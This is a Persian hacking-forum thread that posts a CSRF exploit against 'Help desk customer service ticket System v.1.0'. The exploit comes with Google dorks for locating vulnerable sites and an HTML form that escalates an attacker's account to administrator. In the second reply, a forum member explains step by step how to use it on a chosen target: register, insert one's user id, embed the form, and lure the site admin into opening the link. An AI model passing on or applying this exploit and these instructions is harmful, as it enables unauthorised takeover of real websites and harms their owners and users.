رتبه موضوع:
  • 1 رای - 1 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Help desk customer service ticket System v.1.0 CSRF Vulnerability
#1
Icon35 
کد:
**************************************************
IIIIIIII  RRRRRRRRRRRR        HHHHHHHH    HHHHHHHH
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRRRRRRRR          HHHHHHHHHHHHHHHH  
  IIII      RRRR  RRRR          HHHH        HHHH  
  IIII      RRRR  RRRR          HHHH        HHHH  
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
IIIIIIII  RRRRRRRR    RRRRRR  HHHHHHHH    HHHHHHHH
***************************************************

# Exploit Title: Help desk customer service ticket System v.1.0 CSRF Vulnerability

# Google Dork: inurl:?L=login   inurl:?L=admin.user.list

# Date: 2014

# Exploit Author: IRH

# Version: v.1.0
 
# Tested on: BT , 7

# Software Link: http://www.persianscript.ir/1389/08/06/help-desk-customer-service-ticket-system/

# Download Vulnerability Script : http://www.dl.persianscript.ir/script/persian-ticket-script%28PersianScript.ir%29.zip

# Screen shot: http://cld.persiangig.com/preview/9FtH6IJJjk/190.png


***************************************************

Exploit :


<html>

<body>

<form action="http://localhost/support/?L=admin.user.list" method="post" name="main" id="main">

<input type="hidden" name="userid" value="1124">

<input type="button" name="makeadmin" value="+Admin">

<input type="submit" name="Submit" value="Send">

</form>  

</body>

</html>



*********

info :

change Normal user to admin user with this exploit :D



TnX To :

MojiRider , V30sharp , Black.viper , Zer0killer , SecretWalker , FarBodEzrail , Amirio , AL1R3​Z4, 3is@ ,
Mr.a!i , Mr.3ler0n , Irblackhat , inj3ct0r , 3inst3in , Remot3r , Scoot3r , Black_king , IRH Member
 
./IRaNHaCK.org

http://packetstormsecurity.com/files/125...-CSRF.html
[عکس: fkmrmvd2rit2lpuzr3t.png]
پاسخ }}
سپاس شده توسط:
#2
سلام میشه یکم آموزش بدید که چطوری میشه از این اکسپلویت استفاده کرد کد HTML رو باید چکار کنیم مرسی
پاسخ }}
سپاس شده توسط:
#3
(31 تير 1394، 07:38 صبح)nachia نوشته: سلام میشه یکم آموزش بدید که چطوری میشه از این اکسپلویت استفاده کرد کد HTML رو باید چکار کنیم مرسی


 
درود. دوست عزیز ابتدا پیشنهاد میکنم به دنبال این باشید که باگ CSRF را به خوبی درک کنید.

توسط این آسیب پذیری که سمت کلاینت میباشد، نفوذگر - به هر طریقی که بتواند - لینکی را در اختیار مدیر قرار خواهد داد که پس از باز شدن آن لینک توسط مدیر، چنانچه token برای مدیر ضروری نشده باشد، درخواست نفوذگر انجام خواهد شد.

به مثال زیر توجه کنید :

فرض کنید ما دارای یک سیستم مدیریت محتوا هستیم که داخل پنل ادمین، قابلیتی برای ایجاد مدیر جدید دارد. حال پس از وارد کردن مشخصات مدیر جدید، ما به این صفحه هدایت می شویم :
کد:
site.com/admin/addadmin.php?id=2&username=irh&password=irh
همانطور که مشاهده می کنید برای ایجاد یک مدیر با نام کاربری و رمز عبور irh، از لینکی مشابه لینک بالا استفاده می شود.

حال اگر مدیر این لینک را باز کند، طبیعتاً یک مدیر جدید به سیستم اضافه خواهد شد. حال نفوذگر می تواند این لینک را مستقیماً به مدیر داده و یا آن را به صورت iframe در یک صفحه دیگر جایگذاری کند.

البته این مثال در مورد روش GET بود. این باگ توسط روش POST هم عمل می کند.

در رابطه با سؤال شما، شما باید لینک سایت مورد نظر خود را در قسمت http://localhost/support قرار دهید و سپس کد Html را در یک صفحه جاسازی کنید و سپس لینک صفحه را به مدیر سایت دهید. قبل از این کار، باید در وبسایت مورد نظر ثبت نام کرده و id کاربری خود را در قسمت userid قرار دهید.

پس از باز شدن لینک توسط مدیر، کاربری که توسط شما ایجاد شده سطح دسترسی مدیر کل خواهد گرفت.

موفق باشید
 
مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)
 
پاسخ }}
سپاس شده توسط:


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
Icon35 elFinder 2.0 - file manager for web(rc1) - File Upload Vulnerability Mr.XpR 2 2,284 10 تير 1393، 02:42 عصر
آخرین ارسال: Mr.XpR
Icon35 Kuchi Content Management System Blind Sql Injection Mr.XpR 0 1,824 11 مهر 1392، 01:14 عصر
آخرین ارسال: Mr.XpR
Icon35 ES CmS 0.1 Sql Injection Vulnerability Mr.XpR 1 3,071 6 آذر 1391، 04:52 عصر
آخرین ارسال: Mr.XpR
Icon35 Binamica Web Design Sql Injection Vulnerability Siamak.Black 0 2,059 1 آبان 1391، 07:21 صبح
آخرین ارسال: Siamak.Black
  gonginteractive Web Design Sql Injection Vulnerability Siamak.Black 0 1,887 29 مهر 1391، 02:52 عصر
آخرین ارسال: Siamak.Black
Icon35 goffgrafix Web Design Sql Injection Vulnerability Siamak.Black 0 1,569 20 مهر 1391، 09:13 عصر
آخرین ارسال: Siamak.Black
Icon26 yasmingmi Web Design Sql Injection Vulnerability Siamak.Black 0 1,629 20 مهر 1391، 09:09 عصر
آخرین ارسال: Siamak.Black
Icon25 PCM CMS SQL Injection & Duplicate Login Vulnerability Moji.Rider 0 1,923 14 مهر 1391، 01:25 عصر
آخرین ارسال: Moji.rider
Icon31 dornica Cms Sql Injection Vulnerability Siamak.Black 1 1,993 19 شهريور 1391، 11:11 صبح
آخرین ارسال: Siamak.Black

پرش به انجمن:


کاربران در حال بازدید این موضوع: 1 مهمان